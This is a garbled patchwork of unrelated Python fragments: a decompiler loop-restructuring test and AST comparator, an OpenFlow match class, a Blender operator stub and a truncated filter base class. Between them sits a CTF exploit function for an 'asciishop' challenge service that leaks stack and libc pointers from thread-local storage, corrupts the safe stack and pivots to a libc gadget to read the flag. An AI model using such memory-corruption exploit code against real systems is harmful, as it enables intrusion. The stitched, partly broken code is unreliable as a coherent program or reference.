        annotation_suffix = f' ({self.annotations})' if self.annotations else ''
        return f'SynthesizeRule {self.name}{annotation_suffix}'
def test_empty_endless_loop(task):
    """An empty basic block that jumps to itself must restructure into an
    endless while-loop with an empty body."""
    self_loop_block = BasicBlock(0, instructions=[])
    task.graph.add_node(self_loop_block)
    task.graph.add_edge(UnconditionalEdge(self_loop_block, self_loop_block))
    PatternIndependentRestructuring().run(task)
    # Build the expected AST: a `while (true)` loop around an empty code node.
    logic_context = LogicCondition.generate_new_context()
    endless_loop = WhileLoopNode(LogicCondition.initialize_true(logic_context), reaching_condition=LogicCondition.initialize_true(logic_context))
    expected_ast = AbstractSyntaxTree(endless_loop, {})
    empty_body = expected_ast._add_code_node([])
    expected_ast._add_edge(endless_loop, empty_body)
    assert ASTComparator.compare(task.syntax_tree, expected_ast) and task.syntax_tree.condition_map == expected_ast.condition_map
class ASTComparator():
    """Compares two abstract syntax forests for structural equality.

    Each node receives a "color" — a hash computed bottom-up from the node's
    own representation and its children's colors — and two forests compare
    equal when their root color sets match.
    """

    def __init__(self):
        # Maps each visited AST node to its computed color.
        self._color_of_node: Dict[(AbstractSyntaxTreeNode, Color)] = dict()

    # Restored stripped @classmethod: `compare` takes `cls`, instantiates it
    # via cls(), and is invoked as ASTComparator.compare(a, b) by callers.
    @classmethod
    def compare(cls, ast_forest_1: AbstractSyntaxInterface, ast_forest_2: AbstractSyntaxInterface) -> bool:
        """Return True iff the two forests are structurally equal.

        Both forests are cleaned up (mutated) before comparison.
        """
        if (id(ast_forest_1) == id(ast_forest_2)):
            return True
        ast_forest_1.clean_up()
        ast_forest_2.clean_up()
        # NOTE(review): this early-out requires BOTH a type mismatch AND a
        # root-set mismatch; an `or` may have been intended — confirm.
        if ((type(ast_forest_1) != type(ast_forest_2)) and (set(ast_forest_1.get_roots) != set(ast_forest_2.get_roots))):
            return False
        graph_coloring_generator = cls()
        graph_coloring_generator.color_as_forest(ast_forest_1)
        graph_coloring_generator.color_as_forest(ast_forest_2)
        ast_forest_1_roots = {graph_coloring_generator.color_of_node(root) for root in ast_forest_1.get_roots}
        ast_forest_2_roots = {graph_coloring_generator.color_of_node(root) for root in ast_forest_2.get_roots}
        return (ast_forest_1_roots == ast_forest_2_roots)

    def color_of_node(self, node: AbstractSyntaxTreeNode) -> Optional[Color]:
        """Return the color of ``node``, or None if it was never colored."""
        return self._color_of_node.get(node)

    def color_as_forest(self, as_forest: AbstractSyntaxInterface) -> None:
        """Color every node of the forest bottom-up (children before parents)."""
        for node in as_forest.post_order():
            self._color_of_node[node] = self._compute_color_of(node)

    def _get_children_classes(self, node: AbstractSyntaxTreeNode) -> Tuple[(Color, ...)]:
        """Return the colors of ``node``'s children in canonical order."""
        if (isinstance(node, ConditionNode) and (node.false_branch is not None)):
            # Canonicalize two-armed conditions by ordering the branches by
            # color, so mirrored if/else constructs compare equal.
            if (self._color_of_node[node.true_branch_child] > self._color_of_node[node.false_branch_child]):
                node.switch_branches()
                # Re-color the branch wrapper nodes after the swap.
                self._color_of_node[node.true_branch] = self._compute_color_of(node.true_branch)
                self._color_of_node[node.false_branch] = self._compute_color_of(node.false_branch)
            return (self._color_of_node[node.true_branch], self._color_of_node[node.false_branch])
        return tuple((self._color_of_node[child] for child in node.children))

    def _compute_color_of(self, node: AbstractSyntaxTreeNode) -> Color:
        """Derive a node's color from its own string form and its children's colors."""
        children: Tuple[(Color, ...)] = self._get_children_classes(node)
        identifier = f'{node}, {children}'
        return Color(hash(identifier))
def exploit(start):
    """Run the asciishop exploit against the remote CTF service.

    Leaks a stack pointer and a libc pointer out of thread-local storage,
    computes a libc gadget address, corrupts the safe-stack pointer and
    pivots execution to the gadget, then reads the flag.
    """
    global p

    def go(aslr=False):
        """Launch a local copy under gdb for debugging (unused on remote).

        NOTE(review): the ``aslr`` parameter is ignored for process startup
        (aslr=True is always passed) and only selects the gdb script —
        confirm whether ``aslr=aslr`` was intended.
        """
        global p
        p = process('./asciishop', aslr=True, env={})
        if not aslr:
            gdb.attach(p, gdbscript='\n c\n ')
        else:
            gdb.attach(p, gdbscript='\n #break *0xd0f\n #break *0xb8f\n #break *0xbc\n #break *0xb1f\n c\n ')
        return

    p = remote('challenges.fbctf.com', 1340)
    (first, second, data, index) = find_thread_local_storage()
    # Leak a safe-stack pointer and a libc pointer from the TLS dump.
    stack_leak_offset = (index + 6112)
    safe_stack_leak = u64(data[stack_leak_offset:(stack_leak_offset + 8)])
    libc_leak_offset = (index + 720)
    libc_leak = u64(data[libc_leak_offset:(libc_leak_offset + 8)])
    libc_base = (libc_leak - 96179)
    # Presumably a one-gadget-style execve gadget — offsets are libc-build specific.
    magic_gadget = (libc_base + 324386)
    delete_image(second)
    # FIXME: the fourth argument was syntactically empty in the recovered
    # source (lost literal); '' is a placeholder — restore the real payload.
    upload_image(second, 1, 1, '', ('Q' * 200))
    set_unsafe_stack(second, safe_stack_leak, (stack_leak_offset - 1696))
    destroy_safe_stack(magic_gadget, start)
    p.sendline('cat /home/asciishop/flag')
    print(p.readline('\n'))
    print(p.readline('\n'))
    print(p.readline('\n'))
class OFPMatch(StringifyMixin):
    """OpenFlow 1.3 flow match, encoded as OXM TLVs.

    Supports two APIs:

    * the current dict-like API: match fields passed as keyword arguments to
      the constructor and stored (as user-facing pairs) in ``_fields2``;
    * the deprecated old API: ``set_*`` methods recording state into
      ``FlowWildcards``/``Flow`` plus explicit ``append_field`` calls,
      detected via ``_composed_with_old_api()``.

    Restored decorators that were stripped from the recovered source:
    ``parser``/``from_jsondict`` are classmethods (``parser`` is invoked as
    ``OFPMatch.parser(buf, 0)`` elsewhere in this class) and ``parser_old``
    is a staticmethod (invoked as ``cls.parser_old(match, ...)``).
    """

    def __init__(self, type_=None, length=None, _ordered_fields=None, **kwargs):
        # `type_` is accepted for signature symmetry but the match type is
        # always OFPMT_OXM; `length` is recomputed on serialize()/parser().
        super(OFPMatch, self).__init__()
        self._wc = FlowWildcards()
        self._flow = Flow()
        self.fields = []
        self.type = ofproto.OFPMT_OXM
        self.length = length
        if (_ordered_fields is not None):
            # Internal path (e.g. from_jsondict): fields are already
            # normalized (name, user-value) pairs in the desired order.
            assert (not kwargs)
            self._fields2 = _ordered_fields
        else:
            # Normalize user values, sort by OXM type number (masked types
            # arrive as tuples), then convert back to user representation.
            kwargs = dict((ofproto.oxm_normalize_user(k, v) for (k, v) in kwargs.items()))
            fields = [ofproto.oxm_from_user(k, v) for (k, v) in kwargs.items()]
            fields.sort(key=(lambda x: (x[0][0] if isinstance(x[0], tuple) else x[0])))
            self._fields2 = [ofproto.oxm_to_user(n, v, m) for (n, v, m) in fields]

    def __getitem__(self, key):
        return dict(self._fields2)[key]

    def __contains__(self, key):
        return (key in dict(self._fields2))

    def iteritems(self):
        # Python-2-era alias kept for backward compatibility.
        return iter(dict(self._fields2).items())

    def items(self):
        return self._fields2

    def get(self, key, default=None):
        return dict(self._fields2).get(key, default)

    def stringify_attrs(self):
        # Used by StringifyMixin to render this object.
        (yield ('oxm_fields', dict(self._fields2)))

    def to_jsondict(self):
        """Return a JSON-style dict; old-API state is converted by a
        serialize/parse round trip first."""
        if self._composed_with_old_api():
            o2 = OFPMatch()
            o2.fields = self.fields[:]
            buf = bytearray()
            o2.serialize(buf, 0)
            o = OFPMatch.parser(six.binary_type(buf), 0)
        else:
            o = self
        body = {'oxm_fields': [ofproto.oxm_to_jsondict(k, uv) for (k, uv) in o._fields2], 'length': o.length, 'type': o.type}
        return {self.__class__.__name__: body}

    @classmethod
    def from_jsondict(cls, dict_):
        """Build an OFPMatch from a JSON-style dict; a serialize/parse round
        trip fills in type and length."""
        fields = [ofproto.oxm_from_jsondict(f) for f in dict_['oxm_fields']]
        o = OFPMatch(_ordered_fields=fields)
        buf = bytearray()
        o.serialize(buf, 0)
        return OFPMatch.parser(six.binary_type(buf), 0)

    def __str__(self):
        # Old-API state is converted via a round trip so both styles print
        # the same way.
        if self._composed_with_old_api():
            o2 = OFPMatch()
            o2.fields = self.fields[:]
            buf = bytearray()
            o2.serialize(buf, 0)
            o = OFPMatch.parser(six.binary_type(buf), 0)
        else:
            o = self
        return super(OFPMatch, o).__str__()
    __repr__ = __str__

    def append_field(self, header, value, mask=None):
        """Old API: append a raw OXM match field."""
        self.fields.append(OFPMatchField.make(header, value, mask))

    def _composed_with_old_api(self):
        # True when fields were added via append_field/set_* instead of
        # constructor kwargs.
        return ((self.fields and (not self._fields2)) or (self._wc.__dict__ != FlowWildcards().__dict__))

    def serialize(self, buf, offset):
        """Serialize the match into ``buf`` at ``offset``; return the padded
        length written."""
        if self._composed_with_old_api():
            return self.serialize_old(buf, offset)
        fields = [ofproto.oxm_from_user(k, uv) for (k, uv) in self._fields2]
        hdr_pack_str = '!HH'
        field_offset = (offset + struct.calcsize(hdr_pack_str))
        for (n, value, mask) in fields:
            field_offset += ofproto.oxm_serialize(n, value, mask, buf, field_offset)
        length = (field_offset - offset)
        # Header (type, length) is written after the fields, once the real
        # length is known.
        msg_pack_into(hdr_pack_str, buf, offset, ofproto.OFPMT_OXM, length)
        self.length = length
        # Pad the match structure out to a multiple of 8 bytes.
        pad_len = (utils.round_up(length, 8) - length)
        msg_pack_into(('%dx' % pad_len), buf, field_offset)
        return (length + pad_len)

    def serialize_old(self, buf, offset):
        """Serialize old-API state: translate every set wildcard flag into an
        appended OXM field, then write header + fields + padding."""
        if hasattr(self, '_serialized'):
            raise Exception('serializing an OFPMatch composed with old API multiple times is not supported')
        self._serialized = True
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PORT):
            self.append_field(ofproto.OXM_OF_IN_PORT, self._flow.in_port)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PHY_PORT):
            self.append_field(ofproto.OXM_OF_IN_PHY_PORT, self._flow.in_phy_port)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_METADATA):
            if (self._wc.metadata_mask == UINT64_MAX):
                header = ofproto.OXM_OF_METADATA
            else:
                header = ofproto.OXM_OF_METADATA_W
            self.append_field(header, self._flow.metadata, self._wc.metadata_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_DST):
            if self._wc.dl_dst_mask:
                header = ofproto.OXM_OF_ETH_DST_W
            else:
                header = ofproto.OXM_OF_ETH_DST
            self.append_field(header, self._flow.dl_dst, self._wc.dl_dst_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_SRC):
            if self._wc.dl_src_mask:
                header = ofproto.OXM_OF_ETH_SRC_W
            else:
                header = ofproto.OXM_OF_ETH_SRC
            self.append_field(header, self._flow.dl_src, self._wc.dl_src_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_TYPE):
            self.append_field(ofproto.OXM_OF_ETH_TYPE, self._flow.dl_type)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_VID):
            if (self._wc.vlan_vid_mask == UINT16_MAX):
                header = ofproto.OXM_OF_VLAN_VID
            else:
                header = ofproto.OXM_OF_VLAN_VID_W
            self.append_field(header, self._flow.vlan_vid, self._wc.vlan_vid_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_PCP):
            self.append_field(ofproto.OXM_OF_VLAN_PCP, self._flow.vlan_pcp)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_DSCP):
            self.append_field(ofproto.OXM_OF_IP_DSCP, self._flow.ip_dscp)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_ECN):
            self.append_field(ofproto.OXM_OF_IP_ECN, self._flow.ip_ecn)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_PROTO):
            self.append_field(ofproto.OXM_OF_IP_PROTO, self._flow.ip_proto)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_SRC):
            if (self._wc.ipv4_src_mask == UINT32_MAX):
                header = ofproto.OXM_OF_IPV4_SRC
            else:
                header = ofproto.OXM_OF_IPV4_SRC_W
            self.append_field(header, self._flow.ipv4_src, self._wc.ipv4_src_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_DST):
            if (self._wc.ipv4_dst_mask == UINT32_MAX):
                header = ofproto.OXM_OF_IPV4_DST
            else:
                header = ofproto.OXM_OF_IPV4_DST_W
            self.append_field(header, self._flow.ipv4_dst, self._wc.ipv4_dst_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_SRC):
            self.append_field(ofproto.OXM_OF_TCP_SRC, self._flow.tcp_src)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_DST):
            self.append_field(ofproto.OXM_OF_TCP_DST, self._flow.tcp_dst)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_SRC):
            self.append_field(ofproto.OXM_OF_UDP_SRC, self._flow.udp_src)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_DST):
            self.append_field(ofproto.OXM_OF_UDP_DST, self._flow.udp_dst)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_SRC):
            self.append_field(ofproto.OXM_OF_SCTP_SRC, self._flow.sctp_src)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_DST):
            self.append_field(ofproto.OXM_OF_SCTP_DST, self._flow.sctp_dst)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_TYPE):
            self.append_field(ofproto.OXM_OF_ICMPV4_TYPE, self._flow.icmpv4_type)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_CODE):
            self.append_field(ofproto.OXM_OF_ICMPV4_CODE, self._flow.icmpv4_code)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_OP):
            self.append_field(ofproto.OXM_OF_ARP_OP, self._flow.arp_op)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SPA):
            if (self._wc.arp_spa_mask == UINT32_MAX):
                header = ofproto.OXM_OF_ARP_SPA
            else:
                header = ofproto.OXM_OF_ARP_SPA_W
            self.append_field(header, self._flow.arp_spa, self._wc.arp_spa_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_TPA):
            if (self._wc.arp_tpa_mask == UINT32_MAX):
                header = ofproto.OXM_OF_ARP_TPA
            else:
                header = ofproto.OXM_OF_ARP_TPA_W
            self.append_field(header, self._flow.arp_tpa, self._wc.arp_tpa_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SHA):
            if self._wc.arp_sha_mask:
                header = ofproto.OXM_OF_ARP_SHA_W
            else:
                header = ofproto.OXM_OF_ARP_SHA
            self.append_field(header, self._flow.arp_sha, self._wc.arp_sha_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_THA):
            if self._wc.arp_tha_mask:
                header = ofproto.OXM_OF_ARP_THA_W
            else:
                header = ofproto.OXM_OF_ARP_THA
            self.append_field(header, self._flow.arp_tha, self._wc.arp_tha_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_SRC):
            if len(self._wc.ipv6_src_mask):
                header = ofproto.OXM_OF_IPV6_SRC_W
            else:
                header = ofproto.OXM_OF_IPV6_SRC
            self.append_field(header, self._flow.ipv6_src, self._wc.ipv6_src_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_DST):
            if len(self._wc.ipv6_dst_mask):
                header = ofproto.OXM_OF_IPV6_DST_W
            else:
                header = ofproto.OXM_OF_IPV6_DST
            self.append_field(header, self._flow.ipv6_dst, self._wc.ipv6_dst_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_FLABEL):
            if (self._wc.ipv6_flabel_mask == UINT32_MAX):
                header = ofproto.OXM_OF_IPV6_FLABEL
            else:
                header = ofproto.OXM_OF_IPV6_FLABEL_W
            self.append_field(header, self._flow.ipv6_flabel, self._wc.ipv6_flabel_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_TYPE):
            self.append_field(ofproto.OXM_OF_ICMPV6_TYPE, self._flow.icmpv6_type)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_CODE):
            self.append_field(ofproto.OXM_OF_ICMPV6_CODE, self._flow.icmpv6_code)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TARGET):
            self.append_field(ofproto.OXM_OF_IPV6_ND_TARGET, self._flow.ipv6_nd_target)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_SLL):
            self.append_field(ofproto.OXM_OF_IPV6_ND_SLL, self._flow.ipv6_nd_sll)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TLL):
            self.append_field(ofproto.OXM_OF_IPV6_ND_TLL, self._flow.ipv6_nd_tll)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_LABEL):
            self.append_field(ofproto.OXM_OF_MPLS_LABEL, self._flow.mpls_label)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_TC):
            self.append_field(ofproto.OXM_OF_MPLS_TC, self._flow.mpls_tc)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_BOS):
            self.append_field(ofproto.OXM_OF_MPLS_BOS, self._flow.mpls_bos)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_PBB_ISID):
            if self._wc.pbb_isid_mask:
                header = ofproto.OXM_OF_PBB_ISID_W
            else:
                header = ofproto.OXM_OF_PBB_ISID
            self.append_field(header, self._flow.pbb_isid, self._wc.pbb_isid_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_TUNNEL_ID):
            if self._wc.tunnel_id_mask:
                header = ofproto.OXM_OF_TUNNEL_ID_W
            else:
                header = ofproto.OXM_OF_TUNNEL_ID
            self.append_field(header, self._flow.tunnel_id, self._wc.tunnel_id_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_EXTHDR):
            if self._wc.ipv6_exthdr_mask:
                header = ofproto.OXM_OF_IPV6_EXTHDR_W
            else:
                header = ofproto.OXM_OF_IPV6_EXTHDR
            self.append_field(header, self._flow.ipv6_exthdr, self._wc.ipv6_exthdr_mask)
        field_offset = (offset + 4)
        for f in self.fields:
            f.serialize(buf, field_offset)
            field_offset += f.length
        length = (field_offset - offset)
        msg_pack_into('!HH', buf, offset, ofproto.OFPMT_OXM, length)
        pad_len = (utils.round_up(length, 8) - length)
        msg_pack_into(('%dx' % pad_len), buf, field_offset)
        return (length + pad_len)

    @classmethod
    def parser(cls, buf, offset):
        """Parse an OFPMatch from ``buf``; raises OFPTruncatedMessage (with
        the partially parsed match and residue) on a short buffer."""
        match = OFPMatch()
        (type_, length) = struct.unpack_from('!HH', buf, offset)
        match.type = type_
        match.length = length
        offset += 4
        length -= 4
        exc = None
        residue = None
        # Old-API fields are parsed best-effort; a struct error here is
        # remembered but does not abort the new-API parse below.
        try:
            cls.parser_old(match, buf, offset, length)
        except struct.error as e:
            exc = e
        fields = []
        try:
            while (length > 0):
                (n, value, mask, field_len) = ofproto.oxm_parse(buf, offset)
                (k, uv) = ofproto.oxm_to_user(n, value, mask)
                fields.append((k, uv))
                offset += field_len
                length -= field_len
        except struct.error as e:
            exc = e
            residue = buf[offset:]
        match._fields2 = fields
        if (exc is not None):
            raise exception.OFPTruncatedMessage(match, residue, exc)
        return match

    @staticmethod
    def parser_old(match, buf, offset, length):
        # Populate the deprecated `fields` list for old-API consumers.
        while (length > 0):
            field = OFPMatchField.parser(buf, offset)
            offset += field.length
            length -= field.length
            match.fields.append(field)

    # --- Deprecated old-API setters -----------------------------------
    # Each records a wildcard flag plus the value (and mask, for the
    # *_masked variants) to be emitted later by serialize_old().

    def set_in_port(self, port):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PORT)
        self._flow.in_port = port

    def set_in_phy_port(self, phy_port):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PHY_PORT)
        self._flow.in_phy_port = phy_port

    def set_metadata(self, metadata):
        self.set_metadata_masked(metadata, UINT64_MAX)

    def set_metadata_masked(self, metadata, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_METADATA)
        self._wc.metadata_mask = mask
        self._flow.metadata = (metadata & mask)

    def set_dl_dst(self, dl_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST)
        self._flow.dl_dst = dl_dst

    def set_dl_dst_masked(self, dl_dst, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST)
        self._wc.dl_dst_mask = mask
        self._flow.dl_dst = mac.haddr_bitand(dl_dst, mask)

    def set_dl_src(self, dl_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC)
        self._flow.dl_src = dl_src

    def set_dl_src_masked(self, dl_src, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC)
        self._wc.dl_src_mask = mask
        self._flow.dl_src = mac.haddr_bitand(dl_src, mask)

    def set_dl_type(self, dl_type):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_TYPE)
        self._flow.dl_type = dl_type

    def set_vlan_vid_none(self):
        self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID)
        self._wc.vlan_vid_mask = UINT16_MAX
        self._flow.vlan_vid = ofproto.OFPVID_NONE

    def set_vlan_vid(self, vid):
        self.set_vlan_vid_masked(vid, UINT16_MAX)

    def set_vlan_vid_masked(self, vid, mask):
        # OFPVID_PRESENT marks "a VLAN tag is present" per the OF1.3 spec.
        vid |= ofproto.OFPVID_PRESENT
        self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID)
        self._wc.vlan_vid_mask = mask
        self._flow.vlan_vid = vid

    def set_vlan_pcp(self, pcp):
        self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_PCP)
        self._flow.vlan_pcp = pcp

    def set_ip_dscp(self, ip_dscp):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IP_DSCP)
        self._flow.ip_dscp = ip_dscp

    def set_ip_ecn(self, ip_ecn):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IP_ECN)
        self._flow.ip_ecn = ip_ecn

    def set_ip_proto(self, ip_proto):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IP_PROTO)
        self._flow.ip_proto = ip_proto

    def set_ipv4_src(self, ipv4_src):
        self.set_ipv4_src_masked(ipv4_src, UINT32_MAX)

    def set_ipv4_src_masked(self, ipv4_src, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_SRC)
        self._flow.ipv4_src = ipv4_src
        self._wc.ipv4_src_mask = mask

    def set_ipv4_dst(self, ipv4_dst):
        self.set_ipv4_dst_masked(ipv4_dst, UINT32_MAX)

    def set_ipv4_dst_masked(self, ipv4_dst, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_DST)
        self._flow.ipv4_dst = ipv4_dst
        self._wc.ipv4_dst_mask = mask

    def set_tcp_src(self, tcp_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_SRC)
        self._flow.tcp_src = tcp_src

    def set_tcp_dst(self, tcp_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_DST)
        self._flow.tcp_dst = tcp_dst

    def set_udp_src(self, udp_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_SRC)
        self._flow.udp_src = udp_src

    def set_udp_dst(self, udp_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_DST)
        self._flow.udp_dst = udp_dst

    def set_sctp_src(self, sctp_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_SRC)
        self._flow.sctp_src = sctp_src

    def set_sctp_dst(self, sctp_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_DST)
        self._flow.sctp_dst = sctp_dst

    def set_icmpv4_type(self, icmpv4_type):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_TYPE)
        self._flow.icmpv4_type = icmpv4_type

    def set_icmpv4_code(self, icmpv4_code):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_CODE)
        self._flow.icmpv4_code = icmpv4_code

    def set_arp_opcode(self, arp_op):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_OP)
        self._flow.arp_op = arp_op

    def set_arp_spa(self, arp_spa):
        self.set_arp_spa_masked(arp_spa, UINT32_MAX)

    def set_arp_spa_masked(self, arp_spa, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SPA)
        self._wc.arp_spa_mask = mask
        self._flow.arp_spa = arp_spa

    def set_arp_tpa(self, arp_tpa):
        self.set_arp_tpa_masked(arp_tpa, UINT32_MAX)

    def set_arp_tpa_masked(self, arp_tpa, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_TPA)
        self._wc.arp_tpa_mask = mask
        self._flow.arp_tpa = arp_tpa

    def set_arp_sha(self, arp_sha):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA)
        self._flow.arp_sha = arp_sha

    def set_arp_sha_masked(self, arp_sha, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA)
        self._wc.arp_sha_mask = mask
        self._flow.arp_sha = mac.haddr_bitand(arp_sha, mask)

    def set_arp_tha(self, arp_tha):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA)
        self._flow.arp_tha = arp_tha

    def set_arp_tha_masked(self, arp_tha, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA)
        self._wc.arp_tha_mask = mask
        self._flow.arp_tha = mac.haddr_bitand(arp_tha, mask)

    def set_ipv6_src(self, src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC)
        self._flow.ipv6_src = src

    def set_ipv6_src_masked(self, src, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC)
        self._wc.ipv6_src_mask = mask
        self._flow.ipv6_src = [(x & y) for (x, y) in zip(src, mask)]

    def set_ipv6_dst(self, dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST)
        self._flow.ipv6_dst = dst

    def set_ipv6_dst_masked(self, dst, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST)
        self._wc.ipv6_dst_mask = mask
        self._flow.ipv6_dst = [(x & y) for (x, y) in zip(dst, mask)]

    def set_ipv6_flabel(self, flabel):
        self.set_ipv6_flabel_masked(flabel, UINT32_MAX)

    def set_ipv6_flabel_masked(self, flabel, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_FLABEL)
        self._wc.ipv6_flabel_mask = mask
        self._flow.ipv6_flabel = flabel

    def set_icmpv6_type(self, icmpv6_type):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_TYPE)
        self._flow.icmpv6_type = icmpv6_type

    def set_icmpv6_code(self, icmpv6_code):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_CODE)
        self._flow.icmpv6_code = icmpv6_code

    def set_ipv6_nd_target(self, target):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TARGET)
        self._flow.ipv6_nd_target = target

    def set_ipv6_nd_sll(self, ipv6_nd_sll):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_SLL)
        self._flow.ipv6_nd_sll = ipv6_nd_sll

    def set_ipv6_nd_tll(self, ipv6_nd_tll):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TLL)
        self._flow.ipv6_nd_tll = ipv6_nd_tll

    def set_mpls_label(self, mpls_label):
        self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_LABEL)
        self._flow.mpls_label = mpls_label

    def set_mpls_tc(self, mpls_tc):
        self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_TC)
        self._flow.mpls_tc = mpls_tc

    def set_mpls_bos(self, bos):
        self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_BOS)
        self._flow.mpls_bos = bos

    def set_pbb_isid(self, isid):
        self._wc.ft_set(ofproto.OFPXMT_OFB_PBB_ISID)
        self._flow.pbb_isid = isid

    def set_pbb_isid_masked(self, isid, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_PBB_ISID)
        self._wc.pbb_isid_mask = mask
        self._flow.pbb_isid = isid

    def set_tunnel_id(self, tunnel_id):
        self._wc.ft_set(ofproto.OFPXMT_OFB_TUNNEL_ID)
        self._flow.tunnel_id = tunnel_id

    def set_tunnel_id_masked(self, tunnel_id, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_TUNNEL_ID)
        self._wc.tunnel_id_mask = mask
        self._flow.tunnel_id = tunnel_id

    def set_ipv6_exthdr(self, hdr):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_EXTHDR)
        self._flow.ipv6_exthdr = hdr

    def set_ipv6_exthdr_masked(self, hdr, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_EXTHDR)
        self._wc.ipv6_exthdr_mask = mask
        self._flow.ipv6_exthdr = hdr
class StalkerSceneAddAllShotOutputsOperator(bpy.types.Operator):
    """Blender operator for adding all Shot outputs of a Stalker Scene task.

    Currently it only looks up the Scene task and finishes; the actual
    output-adding logic is not implemented in this body.
    """
    bl_label = 'Add All Shot Outputs'
    bl_idname = 'stalker.scene_add_all_shot_outputs_op'
    stalker_entity_id = bpy.props.IntProperty(name='stalker_entity_id')
    stalker_entity_name = bpy.props.StringProperty(name='stalker_entity_name')

    def execute(self, context):
        # Lazy %-style args keep formatting out of the hot path.
        logger.debug('inside %s.execute()', self.__class__.__name__)
        scene_task = Task.query.get(self.stalker_entity_id)
        logger.debug('scene: %s', scene_task)
        return {'FINISHED'}
class FilterBase(Filter):
    """Base class for filters that simply wrap a single TVTK filter object."""

    # Version number of this class, used for persistence.
    __version__ = 0

    # The wrapped TVTK filter; trait changes on it trigger update_data().
